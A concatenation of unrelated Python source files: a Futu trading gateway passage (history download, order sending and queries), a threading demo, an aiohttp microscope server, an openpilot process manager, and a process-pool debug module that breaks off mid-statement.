if req.interval == Interval.MINUTE:
if req.interval_num not in KLTYPE_MINUTES:
self.write_error(f'查询股票历史范围,请求分钟数{req.interval_num}不在范围:{KLTYPE_MINUTES}')
return history
k_type = f'K_{req.interval_num}M'
else:
if req.interval_num != 1:
self.write_error(f'查询股票历史范围,请求日线{req.interval_num}只能是1')
return history
k_type = KLType.K_DAY
start_date = req.start.strftime('%Y-%m-%d')
end_date = req.end.strftime('%Y-%m-%d') if req.end else None
ret, df, page_req_key = self.quote_ctx.request_history_kline(
code=futu_code,
ktype=k_type,
start=start_date,
end=end_date,
            max_count=limit)  # request the first page (up to `limit` bars per page)
if ret == RET_OK:
for index, row in df.iterrows():
symbol = row['code']
str_time = row['time_key']
dt = datetime.strptime(str_time, '%Y-%m-%d %H:%M:%S')
bar = BarData(
gateway_name=self.gateway_name,
symbol=row['code'],
exchange=req.exchange,
datetime=dt,
trading_day=dt.strftime('%Y-%m-%d'),
interval=req.interval,
interval_num=req.interval_num,
volume=row['volume'],
open_price=float(row['open']),
high_price=float(row['high']),
low_price=float(row['low']),
close_price=float(row['close'])
)
history.append(bar)
else:
return history
        while page_req_key is not None:  # request all remaining pages
ret, df, page_req_key = self.quote_ctx.request_history_kline(
code=futu_code,
ktype=k_type,
start=start_date,
end=end_date,
                page_req_key=page_req_key)  # request the next page of data
if ret == RET_OK:
for index, row in df.iterrows():
symbol = row['code']
str_time = row['time_key']
dt = datetime.strptime(str_time, '%Y-%m-%d %H:%M:%S')
bar = BarData(
gateway_name=self.gateway_name,
symbol=row['code'],
exchange=req.exchange,
datetime=dt,
trading_day=dt.strftime('%Y-%m-%d'),
interval=req.interval,
interval_num=req.interval_num,
volume=row['volume'],
open_price=float(row['open']),
high_price=float(row['high']),
low_price=float(row['low']),
close_price=float(row['close'])
)
history.append(bar)
return history
def download_bars(self, req: HistoryRequest):
"""获取某只股票的历史K线数据"""
history = []
limit = 60
if req.interval not in [Interval.MINUTE, Interval.DAILY]:
self.write_error(f'查询股票历史范围,本接口只支持分钟/日线')
return history
futu_code = '{}.{}'.format(EXCHANGE_VT2FUTU.get(req.exchange), req.symbol)
if req.interval == Interval.MINUTE:
if req.interval_num not in KLTYPE_MINUTES:
self.write_error(f'查询股票历史范围,请求分钟数{req.interval_num}不在范围:{KLTYPE_MINUTES}')
return history
k_type = f'K_{req.interval_num}M'
else:
if req.interval_num != 1:
self.write_error(f'查询股票历史范围,请求日线{req.interval_num}只能是1')
return history
k_type = KLType.K_DAY
start_date = req.start.strftime('%Y-%m-%d')
end_date = req.end.strftime('%Y-%m-%d') if req.end else None
ret, df, page_req_key = self.quote_ctx.request_history_kline(
code=futu_code,
ktype=k_type,
start=start_date,
end=end_date,
            max_count=limit)  # request the first page (up to `limit` bars per page)
if ret == RET_OK:
for index, row in df.iterrows():
symbol = row['code']
str_time = row['time_key']
dt = datetime.strptime(str_time, '%Y-%m-%d %H:%M:%S')
bar = OrderedDict({
"datetime": str_time,
"open": float(row['open']),
"close": float(row['close']),
"high": float(row['high']),
"low": float(row['low']),
"volume": row['volume'],
"amount": row['turnover'],
"symbol": row['code'],
"trading_date": dt.strftime('%Y-%m-%d'),
"date": dt.strftime('%Y-%m-%d'),
"time": dt.strftime('%H:%M:%S'),
"pre_close": float(row['last_close']),
"turnover_rate": float(row.get('turnover_rate', 0)),
"change_rate": float(row.get('change_rate', 0))
})
history.append(bar)
else:
return history
        while page_req_key is not None:  # request all remaining pages
ret, df, page_req_key = self.quote_ctx.request_history_kline(
code=futu_code,
ktype=k_type,
start=start_date,
end=end_date,
                page_req_key=page_req_key)  # request the next page of data
if ret == RET_OK:
for index, row in df.iterrows():
symbol = row['code']
str_time = row['time_key']
dt = datetime.strptime(str_time, '%Y-%m-%d %H:%M:%S')
bar = OrderedDict({
"datetime": str_time,
"open": float(row['open']),
"close": float(row['close']),
"high": float(row['high']),
"low": float(row['low']),
"volume": row['volume'],
"amount": row['turnover'],
"symbol": row['code'],
"trading_date": dt.strftime('%Y-%m-%d'),
"date": dt.strftime('%Y-%m-%d'),
"time": dt.strftime('%H:%M:%S'),
"pre_close": float(row['last_close']),
"turnover_rate": float(row.get('turnover_rate', 0)),
"change_rate": float(row.get('change_rate', 0))
})
history.append(bar)
return history
def send_order(self, req: OrderRequest):
"""发送委托"""
side = DIRECTION_VT2FUTU[req.direction]
futu_order_type = OrderType.NORMAL # Only limit order is supported.
# Set price adjustment mode to inside adjustment.
if req.direction is Direction.LONG:
adjust_limit = 0.05
else:
adjust_limit = -0.05
futu_symbol = convert_symbol_vt2futu(req.symbol, req.exchange)
        # HK orders must be for a whole number of shares
if req.exchange == Exchange.SEHK:
self.write_log(f'交易手数:{req.volume}=>{int(req.volume)}')
req.volume = int(req.volume)
local_orderid = self.order_manager.new_local_orderid()
order = req.create_order_data(local_orderid, self.gateway_name)
        # Publish the order with submitting status
order.status = Status.SUBMITTING
self.order_manager.on_order(order)
code, data = self.trade_ctx.place_order(
req.price,
req.volume,
futu_symbol,
side,
futu_order_type,
trd_env=self.env,
adjust_limit=adjust_limit,
)
if code:
self.write_log(f"委托失败:{data}")
order.status = Status.REJECTED
self.order_manager.on_order(order)
return ""
sys_orderid = ""
for ix, row in data.iterrows():
sys_orderid = str(row.get("order_id",""))
if len(sys_orderid) > 0:
self.write_log(f'系统委托号:{sys_orderid}')
break
if len(sys_orderid) == 0:
order.status = Status.REJECTED
self.order_manager.on_order(order)
return ""
        # Bind the broker (system) order id
order.sys_orderid = sys_orderid
order.status = Status.NOTTRADED
self.order_manager.update_orderid_map(local_orderid, sys_orderid)
        # Publish the order as submitted (not yet traded)
self.order_manager.on_order(copy(order))
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
""""""
order = self.order_manager.get_order_with_local_orderid(req.orderid)
        # Mark the order as cancelling before sending the request
if order:
if order.status in [Status.REJECTED, Status.ALLTRADED, Status.CANCELLED]:
self.write_error(f'委托单:{req.orderid},状态已经是:{order.status},不能撤单')
return False
order.status = Status.CANCELLING
self.order_manager.on_order(order)
sys_orderid = order.sys_orderid
else:
sys_orderid = req.orderid
        # Send the cancel request to the API
code, data = self.trade_ctx.modify_order(
ModifyOrderOp.CANCEL, sys_orderid, 0, 0, trd_env=self.env
)
if code:
self.write_log(f"撤单失败:{data}")
return False
else:
self.write_log(f'成功发出撤单请求:orderid={req.orderid},sys_orderid:{sys_orderid}')
return True
def query_contract(self):
""""""
for product, futu_product in PRODUCT_VT2FUTU.items():
code, data = self.quote_ctx.get_stock_basicinfo(
self.market, futu_product
)
self.write_log(f'开始查询{futu_product}市场的合约清单')
if code:
self.write_log(f"查询合约信息失败:{data}")
return
for ix, row in data.iterrows():
symbol, exchange = convert_symbol_futu2vt(row["code"])
contract = ContractData(
symbol=symbol,
exchange=exchange,
name=row["name"],
product=product,
size=1,
pricetick=0.001,
net_position=True,
history_data=True,
gateway_name=self.gateway_name,
)
self.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
self.write_log("合约信息查询成功")
def query_account(self):
""""""
code, data = self.trade_ctx.accinfo_query(trd_env=self.env, acc_id=0)
if code:
self.write_log(f"查询账户资金失败:{data}")
return
for ix, row in data.iterrows():
account = AccountData(
accountid=f"{self.gateway_name}_{self.market}",
balance=float(row["total_assets"]),
frozen=(float(row["total_assets"]) - float(row["avl_withdrawal_cash"])),
gateway_name=self.gateway_name,
)
self.on_account(account)
def query_position(self):
""""""
code, data = self.trade_ctx.position_list_query(
trd_env=self.env, acc_id=0
)
if code:
self.write_log(f"查询持仓失败:{data}")
return
for ix, row in data.iterrows():
symbol, exchange = convert_symbol_futu2vt(row["code"])
pos = PositionData(
symbol=symbol,
exchange=exchange,
direction=Direction.LONG,
volume=row["qty"],
frozen=(float(row["qty"]) - float(row["can_sell_qty"])),
price=float(row["cost_price"]),
pnl=float(row["pl_val"]),
gateway_name=self.gateway_name,
)
self.on_position(pos)
def query_order(self):
""""""
code, data = self.trade_ctx.order_list_query("", trd_env=self.env)
if code:
self.write_log(f"查询委托失败:{data}")
return
self.process_order(data)
self.write_log("委托查询成功")
def query_trade(self):
""""""
code, data = self.trade_ctx.deal_list_query("", trd_env=self.env)
if code:
self.write_log(f"查询成交失败:{data}")
return
self.process_deal(data)
self.write_log("成交查询成功")
def close(self):
""""""
if self.quote_ctx:
self.quote_ctx.close()
if self.trade_ctx:
self.trade_ctx.close()
def get_tick(self, code):
"""
Get tick buffer.
"""
tick = self.ticks.get(code, None)
symbol, exchange = convert_symbol_futu2vt(code)
if not tick:
tick = TickData(
symbol=symbol,
exchange=exchange,
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[code] = tick
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
return tick
def process_quote(self, data):
"""报价推送"""
for ix, row in data.iterrows():
symbol = row["code"]
tick = self.get_tick(symbol)
date = row["data_date"].replace("-", "")
time = row["data_time"]
tick.datetime = datetime.strptime(
f"{date} {time}", "%Y%m%d %H:%M:%S")
tick.open_price = row["open_price"]
tick.high_price = row["high_price"]
tick.low_price = row["low_price"]
tick.pre_close = row["prev_close_price"]
tick.last_price = row["last_price"]
tick.volume = row["volume"]
if "price_spread" in row:
spread = row["price_spread"]
tick.limit_up = tick.last_price + spread * 10
tick.limit_down = tick.last_price - spread * 10
self.on_tick(copy(tick))
def process_orderbook(self, data):
""""""
symbol = data["code"]
tick = self.get_tick(symbol)
d = tick.__dict__
for i in range(5):
bid_data = data["Bid"][i]
ask_data = data["Ask"][i]
n = i + 1
d["bid_price_%s" % n] = bid_data[0]
d["bid_volume_%s" % n] = bid_data[1]
d["ask_price_%s" % n] = ask_data[0]
d["ask_volume_%s" % n] = ask_data[1]
if tick.datetime:
self.on_tick(copy(tick))
def process_order(self, data):
"""
Process order data for both query and update.
"""
for ix, row in data.iterrows():
# Ignore order with status DELETED
if row["order_status"] == OrderStatus.DELETED:
continue
symbol, exchange = convert_symbol_futu2vt(row["code"])
            # Get the broker (system) order id
sys_orderid = str(row["order_id"])
            # Look up the cached order by system order id
order = self.order_manager.get_order_with_sys_orderid(sys_orderid)
if order is None:
                # Map the system order id to a local order id
local_orderid = self.order_manager.get_local_orderid(sys_orderid)
                # Create and cache a local order object
order = OrderData(
symbol=symbol,
exchange=exchange,
orderid=local_orderid,
sys_orderid=sys_orderid,
direction=DIRECTION_FUTU2VT[row["trd_side"]],
price=float(row["price"]),
volume=row["qty"],
traded=row["dealt_qty"],
status=STATUS_FUTU2VT[row["order_status"]],
time=row["create_time"].split(" ")[-1],
gateway_name=self.gateway_name,
)
self.write_log(f'新建委托单缓存=>{order.__dict__}')
self.order_manager.on_order(copy(order))
else:
                # Cached order exists; check whether status or traded volume changed
changed = False
order_status = STATUS_FUTU2VT[row["order_status"]]
if order.status != order_status:
order.status = order_status
changed = True
if order.traded != row["dealt_qty"]:
order.traded = row["dealt_qty"]
changed = True
if changed:
self.write_log(f'委托单更新=>{order.__dict__}')
self.order_manager.on_order(copy(order))
def process_deal(self, data):
"""
Process trade data for both query and update.
"""
for ix, row in data.iterrows():
            # Broker deal (trade) id
tradeid = str(row["deal_id"])
if tradeid in self.trades:
continue
self.trades.add(tradeid)
symbol, exchange = convert_symbol_futu2vt(row["code"])
            # System order id
sys_orderid = row["order_id"]
            # Local order id
local_orderid = self.order_manager.get_local_orderid(sys_orderid)
trade = TradeData(
symbol=symbol,
exchange=exchange,
direction=DIRECTION_FUTU2VT[row["trd_side"]],
tradeid=tradeid,
orderid=local_orderid,
sys_orderid=sys_orderid,
price=float(row["price"]),
volume=row["qty"],
time=row["create_time"].split(" ")[-1],
gateway_name=self.gateway_name,
)
self.on_trade(trade)
def convert_symbol_futu2vt(code):
"""
Convert symbol from futu to vt.
"""
code_list = code.split(".")
futu_exchange = code_list[0]
futu_symbol = ".".join(code_list[1:])
exchange = EXCHANGE_FUTU2VT[futu_exchange]
return futu_symbol, exchange
def convert_symbol_vt2futu(symbol, exchange):
"""
Convert symbol from vt to futu.
"""
futu_exchange = EXCHANGE_VT2FUTU[exchange]
return f"{futu_exchange}.{symbol}"
|
f1.py
|
from threading import Thread
import threading
from time import sleep
def fib_calc(begin, end):
""" Calculae fib """
a, b = 0, begin
while b < end:
print(b)
a, b = b, a + b
class CookBook(Thread):
def __init__(self):
Thread.__init__(self)
self.message = "This is my thread"
def print_message(self):
print(self.message)
def run(self):
print("Threadind start\n")
x = 0
while x < 10:
self.print_message()
sleep(1)
x += 2
print("Thread end\n")
def function_i(i):
name = threading.current_thread().getName()
print(f" {name} function {i}")
return
if __name__ == '__main__':
threads = []
for i in range(10):
t = threading.Thread(target=function_i, args=(i,))
threads.append(t)
t.start()
t.join()
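# Hedged follow-up sketch: fib_calc and CookBook are defined above but never
# exercised by the __main__ block, so this shows one way they could be run.
def demo_unused_pieces():
    fib_calc(1, 100)   # prints the Fibonacci numbers below 100
    book = CookBook()
    book.start()
    book.join()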
|
microscope.py
|
import logging
import os
import threading
import aiohttp_cors
from aiohttp import web
from controllers.controller import routes, IController
from bootstrapper import Bootstapper
from services.ws import WebSocketManager
from workers.workers import IWorker
ROOT = os.path.dirname(__file__)
container=Bootstapper().bootstrap()
if __name__ == "__main__":
    os.makedirs('/deepmicroscopy', exist_ok=True)
logging.basicConfig(level=logging.INFO)
app = web.Application()
cors = aiohttp_cors.setup(app)
workers = container.resolve_all(IWorker)
for worker in workers:
threading.Thread(target=worker.work).start()
controllers = container.resolve_all(IController)
for controller in controllers:
routes.add_class_routes(controller)
app.add_routes([web.get('/ws', WebSocketManager.websocket_handler)])
app.add_routes(routes)
web.run_app(app, port=8080)
|
manager.py
|
#!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC, EON
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import dirty, get_git_commit, version, origin, branch, commit, \
terms_version, training_version, comma_remote, \
get_git_branch, get_git_remote
from selfdrive.hardware.eon.apk import system
sys.path.append(os.path.join(BASEDIR, "pyextra"))
def manager_init():
# update system time from panda
set_time(cloudlog)
params = Params()
params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
default_params = [
("OpenpilotEnabledToggle", "1"),
("CommunityFeaturesToggle", "1"),
("IsMetric", "1"),
# HKG
("UseClusterSpeed", "0"),
("LongControlEnabled", "0"),
("MadModeEnabled", "0"),
("IsLdwsCar", "0"),
("LaneChangeEnabled", "1"),
("AutoLaneChangeEnabled", "1"),
("SccSmootherSlowOnCurves", "0"),
("SccSmootherSyncGasPressed", "0"),
("StockNaviDecelEnabled", "0"),
("ShowDebugUI", "0"),
("UseSMDPSHarness", "0"),
("SSCOD", "0"),
("DisableUpdates", "0"),
("LoggerEnabled", "0"),
("CleanUI", "1"),
("AR", "0"),
("UseLQR", "0"),
("PutPrebuilt", "0"),
("TPMS_Alerts", "1"),
("PutPrebuilt", "0"),
("StockNaviDecelEnabled", "0"),
("ShowDebugUI", "0"),
("CustomLeadMark", "0"),
("HyundaiNaviSL", "0"),
("DisableOpFcw", "0"),
("NewRadarInterface", "0"),
("LowSpeedAlerts", "1"),
]
if not PC:
default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
if params.get_bool("RecordFrontLock"):
params.put_bool("RecordFront", True)
if not params.get_bool("DisableRadar_Allow"):
params.delete("DisableRadar")
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put_bool("Passive", bool(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set version params
params.put("Version", version)
params.put("TermsVersion", terms_version)
params.put("TrainingVersion", training_version)
params.put("GitCommit", get_git_commit(default=""))
params.put("GitBranch", get_git_branch(default=""))
params.put("GitRemote", get_git_remote(default=""))
# set dongle id
reg_res = register(show_spinner=True)
if reg_res:
dongle_id = reg_res
else:
serial = params.get("HardwareSerial")
raise Exception(f"Registration failed for device {serial}")
os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
if comma_remote and not (os.getenv("NOLOG") or os.getenv("NOCRASH") or PC):
crash.init()
crash.bind_user(id=dongle_id)
crash.bind_extra(dirty=dirty, origin=origin, branch=branch, commit=commit,
device=HARDWARE.get_device_type())
def manager_prepare():
for p in managed_processes.values():
p.prepare()
def manager_cleanup():
for p in managed_processes.values():
p.stop()
cloudlog.info("everything is dead")
def manager_thread():
if EON:
Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd",)).start()
system("am startservice com.neokii.optool/.MainService")
Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter",)).start()
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
#subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
ignore = []
if params.get("DongleId", encoding='utf8') == UNREGISTERED_DONGLE_ID:
ignore += ["manage_athenad", "uploader"]
if os.getenv("NOBOARD") is not None:
ignore.append("pandad")
if os.getenv("BLOCK") is not None:
ignore += os.getenv("BLOCK").split(",")
ensure_running(managed_processes.values(), started=False, not_run=ignore)
started_prev = False
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['managerState'])
while True:
sm.update()
not_run = ignore[:]
if sm['deviceState'].freeSpacePercent < 5:
not_run.append("loggerd")
started = sm['deviceState'].started
driverview = params.get_bool("IsDriverViewEnabled")
ensure_running(managed_processes.values(), started, driverview, not_run)
# trigger an update after going offroad
if started_prev and not started and 'updated' in managed_processes:
os.sync()
managed_processes['updated'].signal(signal.SIGHUP)
started_prev = started
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
for p in managed_processes.values() if p.proc]
cloudlog.debug(' '.join(running_list))
# send managerState
msg = messaging.new_message('managerState')
msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
pm.send('managerState', msg)
# TODO: let UI handle this
# Exit main loop when uninstall is needed
if params.get_bool("DoUninstall"):
break
def main():
prepare_only = os.getenv("PREPAREONLY") is not None
manager_init()
# Start UI early so prepare can happen in the background
if not prepare_only:
managed_processes['ui'].start()
manager_prepare()
if prepare_only:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
manager_cleanup()
if Params().get_bool("DoUninstall"):
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
unblock_stdout()
try:
main()
except Exception:
add_file_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
fastprocesspool_debug.py
|
# Copyright 2018 Martin Bammer. All Rights Reserved.
# Licensed under MIT license.
"""Implements a lightweight as fast process pool."""
__author__ = 'Martin Bammer (mrbm74@gmail.com)'
import sys
import atexit
import time
import inspect
import threading
import itertools
from collections import deque
from multiprocessing import Process, Pipe
if sys.version_info[0] > 2:
import _thread
from os import cpu_count
else:
import thread as _thread
from multiprocessing import cpu_count
# Create own semaphore class which is much faster than the original version in the
# threading module.
class Semaphore(object):
def __init__(self):
self._value = 0
self._value_lock = _thread.allocate_lock()
self._zero_lock = _thread.allocate_lock()
self._zero_lock.acquire()
def acquire(self):
if self._value < 1:
self._zero_lock.acquire()
with self._value_lock:
self._value -= 1
def release(self):
if self._zero_lock.locked():
try:
self._zero_lock.release()
except:
pass
with self._value_lock:
self._value += 1
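# Hedged micro-example of the Semaphore above (illustrative only, not used by
# the pool): a consumer blocks in acquire() until the producer calls release().
def _semaphore_demo():
    sem = Semaphore()
    box = deque()

    def consumer():
        sem.acquire()                 # blocks while the internal counter is < 1
        print("consumed", box.popleft())

    t = threading.Thread(target=consumer)
    t.start()
    box.append(42)
    sem.release()                     # wakes the blocked consumer
    t.join()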
_shutdown = False
_job_cnt = Semaphore()
_childs = set()
LOGGER_NAME = 'fastprocesspool'
DEFAULT_LOGGING_FORMAT = '[%(levelname)s/%(processName)s] %(message)s'
def _python_exit():
global _shutdown
print("_python_exit")
_shutdown = True
_job_cnt.release()
for thread in _childs:
thread.join()
atexit.register(_python_exit)
class Redirect2Pipe(object):
def __init__(self, stream):
self.stream = stream
def write(self, buf):
self.stream.send(buf)
def _child(stdout, stderr, jobs, errors, name):
sys.stdout = Redirect2Pipe(stdout)
sys.stderr = Redirect2Pipe(stderr)
print(name, "child STARTED")
jobs_recv = jobs.recv
jobs_send = jobs.send
errors_send = errors.send
inspect_isgeneratorfunction = inspect.isgeneratorfunction
while True:
try:
job = jobs_recv()
#print(name, "child JOB", job)
except Exception as exc:
print("child EXC", exc)
errors_send(exc)
break
if job is None:
break
try:
fn, done_callback, args, kwargs = job
if inspect.isgeneratorfunction(fn):
for result in fn(*args, **kwargs):
jobs_send(( done_callback, result ))
else:
jobs_send(( done_callback, fn(*args, **kwargs) ))
except Exception as exc:
print("EXC", exc)
errors_send(exc)
print(name, "child EXIT")
def _child_results_thread(have_results, results, jobs):
jobs_send = jobs.send
while True:
have_results.acquire()
results_chunk = []
exit_thread = False
try:
while True:
result = results.popleft()
if result is None:
exit_thread = True
break
results_chunk.append(result)
except:
pass
#print(results_chunk)
if results_chunk:
jobs_send(results_chunk)
if exit_thread:
break
def _child_chunks(stdout, stderr, child_id, jobs, errors, max_chunk_size, itr):
sys.stdout = Redirect2Pipe(stdout)
sys.stderr = Redirect2Pipe(stderr)
print(child_id, "child_CHUNKS STARTED")
errors_send = errors.send
results = deque()
have_results = _thread.allocate_lock()
have_results.acquire()
thr_res = threading.Thread(target = _child_results_thread, args = ( have_results, results, jobs ),
name = child_id + "child_results")
thr_res.daemon = True
thr_res.start()
inspect_isgeneratorfunction = inspect.isgeneratorfunction
if itr is None:
jobs_recv = jobs.recv
while True:
try:
jobs = jobs_recv()
except Exception as exc:
errors_send(exc)
break
if jobs is None:
break
for job in jobs:
try:
fn, done_callback, args, kwargs = job
if inspect_isgeneratorfunction(fn):
for result in fn(*args, **kwargs):
results.append(( done_callback, result ))
else:
results.append(( done_callback, fn(*args, **kwargs) ))
if (len(results) >= max_chunk_size) and have_results.locked():
have_results.release()
except Exception as exc:
errors_send(exc)
else:
for job in itr:
try:
fn, args = job
results.append(fn(args))
if (len(results) >= max_chunk_size) and have_results.locked():
have_results.release()
except Exception as exc:
errors_send(exc)
results.append(None)
if have_results.locked():
have_results.release()
thr_res.join()
class Pool(object):
def __init__(self, max_childs = None, child_name_prefix = "", done_callback = None,
failed_callback = None, log_level = None, max_chunk_size = 1):
global _shutdown, _job_cnt
_shutdown = False
_job_cnt = Semaphore()
print("\nNEW POOL", _childs)
self.max_childs = None
if max_childs is None:
self.max_childs = cpu_count()
elif max_childs > 0:
self.max_childs = max_childs
else:
self.max_childs = cpu_count() + max_childs
if self.max_childs <= 0:
raise ValueError("Number of child threads must be greater than 0")
self.child_name_prefix = child_name_prefix + "-" if child_name_prefix else "ProcessPool%s-" % id(self)
self._max_chunk_size = max_chunk_size
self._child_cnt = 0
self.jobs = deque()
self.done = deque()
self.failed = deque()
self._done_cnt = Semaphore()
self._failed_cnt = Semaphore()
self.logger = None
if done_callback:
self._thr_done = threading.Thread(target = self._done_thread, args = ( done_callback, ),
name = "ProcessPoolDone")
self._thr_done.daemon = True
self._thr_done.start()
if failed_callback or log_level:
if log_level:
import logging
self.logger = logging.getLogger(LOGGER_NAME)
self.logger.propagate = False
formatter = logging.Formatter(DEFAULT_LOGGING_FORMAT)
handler = logging.StreamHandler()
handler.setFormatter(formatter)
self.logger.addHandler(handler)
if log_level:
self.logger.setLevel(log_level)
self._thr_failed = threading.Thread(target = self._failed_thread, args = ( failed_callback, ),
name = "ProcessPoolFailed")
self._thr_failed.daemon = True
self._thr_failed.start()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
def _stdout_thread(self, stdout):
stdout_recv = stdout.recv
while not _shutdown:
text = stdout_recv()
if text is None:
break
if self.logger is None:
print(text)
else:
self.logger.info(text)
def _stderr_thread(self, stderr):
stderr_recv = stderr.recv
while not _shutdown:
text = stderr_recv()
if text is None:
break
if self.logger is None:
print(text, file = sys.stderr)
else:
self.logger.error(text)
def _done_thread(self, done_callback):
done_popleft = self.done.popleft
_done_cnt_acquire = self._done_cnt.acquire
while not _shutdown:
try:
result = done_popleft()
#print("_done_thread RESULT")
except Exception as exc:
print("_done_thread", exc)
if _shutdown:
break
_done_cnt_acquire()
else:
done_callback(result)
def _failed_thread(self, failed_callback):
failed_popleft = self.failed.popleft
_failed_cnt_acquire = self._failed_cnt.acquire
while not _shutdown:
try:
result = failed_popleft()
print("_failed_thread", result)
except Exception as exc:
print("_failed_thread", exc)
if _shutdown:
break
_failed_cnt_acquire()
else:
failed_callback(result)
def _sender_thread_loop(self, job_conn):
_job_cnt_acquire = _job_cnt.acquire
failed_append = self.failed.append
jobs_popleft = self.jobs.popleft
job_conn_send = job_conn.send
print(threading.current_thread().name, "_sender_thread STARTED")
while True:
try:
job = jobs_popleft()
#print(threading.current_thread().name, "_sender_thread", job)
except:
if _shutdown:
_job_cnt.release()
break
# Locking is expensive. So only use it when needed.
_job_cnt_acquire()
continue
if job is None or _shutdown:
print("_sender_thread shutdown", _shutdown)
_job_cnt.release()
break
try:
job_conn_send(job)
except Exception as exc:
failed_append(exc)
def _sender_thread_loop_chunks(self, job_conn):
_job_cnt_acquire = _job_cnt.acquire
failed_append = self.failed.append
jobs_popleft = self.jobs.popleft
job_conn_send = job_conn.send
running = True
while running:
jobs = []
for _ in range(self._max_chunk_size):
try:
job = jobs_popleft()
if job is None:
running = False
break
jobs.append(job)
except:
break
if _shutdown:
_job_cnt.release()
break
if not jobs and running:
# Locking is expensive. So only use it when needed.
_job_cnt_acquire()
continue
try:
job_conn_send(jobs)
except Exception as exc:
failed_append(exc)
def _sender_thread(self, job_conn, rem_job_conn, rem_exc_conn, rem_stdout, rem_stderr,
thr_stdout, thr_stderr, thr_rcv, thr_exc, child, itr):
print(threading.current_thread().name, "_sender_thread SHUTDOWN WAIT")
print(threading.current_thread().name, "child ALIVE JOINING", child.is_alive())
if itr is None:
if self._max_chunk_size > 1 :
self._sender_thread_loop_chunks(job_conn)
else:
self._sender_thread_loop(job_conn)
job_conn.send(None)
child.join()
else:
while not _shutdown and child.is_alive():
child.join(0.1)
print(threading.current_thread().name, "_sender_thread child JOINED")
rem_job_conn.send(None)
self._join_thread(thr_rcv, 0.0, None)
rem_exc_conn.send(None)
self._join_thread(thr_exc, 0.0, None)
print(threading.current_thread().name, "_sender_thread thr_rcv thr_exc JOINED")
if thr_stdout.is_alive():
rem_stdout.send(None)
thr_stdout.join()
if thr_stderr.is_alive():
rem_stderr.send(None)
thr_stderr.join()
print(threading.current_thread().name, "_sender_thread EXIT")
def _receiver_thread(self, job_conn, done_append):
_done_cnt = self._done_cnt
_done_cnt_release = _done_cnt.release
done_append = self.done.append if done_append else False
done_extend = self.done.extend
job_conn_recv = job_conn.recv
print(threading.current_thread().name, "_receiver_thread STARTED")
while True:
results = job_conn_recv()
if results is None or _shutdown:
print(threading.current_thread().name, "_receiver_thread SHUTDOWN", _shutdown)
break
print(threading.current_thread().name, "_receiver_thread %d RESULTS" % len(results))
if done_append is False:
continue
if isinstance(results, tuple):
done_callback, value = results
if done_callback is True:
done_append(value)
if _done_cnt._value < 1:
_done_cnt_release()
elif callable(done_callback):
done_callback(value)
else:
for result in results:
done_callback, value = result
if done_callback is True:
done_append(value)
if _done_cnt._value < 1:
_done_cnt_release()
elif callable(done_callback):
done_callback(value)
print(threading.current_thread().name, "_receiver_thread EXIT")
def _fast_receiver_thread(self, job_conn, done_append):
_done_cnt = self._done_cnt
_done_cnt_release = _done_cnt.release
done_append = self.done.append if done_append else False
done_extend = self.done.extend
job_conn_recv = job_conn.recv
while True:
results = job_conn_recv()
if results is None or _shutdown:
break
if done_append is False:
continue
done_extend(results)
if _done_cnt._value < 1:
_done_cnt_release()
def _exception_thread(self, exc_conn):
_failed_cnt = self._failed_cnt
_failed_cnt_release = _failed_cnt.release
failed_append = self.failed.append
exc_conn_recv = exc_conn.recv
print(threading.current_thread().name, "_exception_thread STARTED")
while True:
exc = exc_conn_recv()
print("_exception_thread", exc)
if exc is None or _shutdown:
print(threading.current_thread().name, "_exception_thread SHUTDOWN", _shutdown)
break
failed_append(exc)
if _failed_cnt._value < 1:
_failed_cnt_release()
print(threading.current_thread().name, "_exception_thread EXIT")
def _start_child(self, itr, done_append):
self._child_cnt += 1
print("_start_child STARTING", self._child_cnt, self._max_chunk_size)
child_id = self.child_name_prefix + str(self._child_cnt)
loc_job_conn, rem_job_conn = Pipe()
loc_exc_conn, rem_exc_conn = Pipe()
loc_stdout, rem_stdout = Pipe(False)
loc_stderr, rem_stderr = Pipe(False)
if (self._max_chunk_size > 1) or not itr is None:
child = Process(target = _child_chunks,
